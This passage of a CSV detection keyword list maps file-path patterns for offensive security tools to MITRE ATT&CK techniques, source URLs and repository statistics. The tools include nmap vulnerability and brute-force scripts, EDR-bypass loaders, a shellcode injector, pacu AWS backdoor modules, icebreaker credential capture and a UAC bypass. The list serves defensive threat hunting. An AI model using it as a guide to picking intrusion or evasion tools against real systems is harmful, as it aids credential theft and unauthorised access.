TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-shellshock.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-sitemap-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-slowloris.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-slowloris-check.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-sql-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/https-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-stored-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-svn-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-svn-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-tenda-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"*/http-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-tplink-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-trace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-trane-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-unsafe-output-escaping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-useragent-tester.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-userdir-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vhosts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-virustotal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vlcstreamer-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vmware-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2006-3392.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2009-3960.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2010-0738.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2010-2861.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2011-3192.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2011-3368.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2012-1823.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2013-0156.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2013-6786.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2013-7091.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2014-2126.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2014-2127.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2014-2128.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2014-2129.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2014-3704.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2014-8877.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2015-1427.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2015-1635.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2017-1001000.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" +"*/http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-waf-fingerprint.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-webdav-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-wordpress-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-wordpress-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-wordpress-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*/HuanLoader/*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*/HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/Hypnos.git*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*/hypobrychium.git*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" +"*/iam__backdoor_users_password*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/iam__bruteforce_permissions/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/iam__privesc_scan*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/iax2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/icap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/icebreaker.git*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" +"*/iec-identify.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 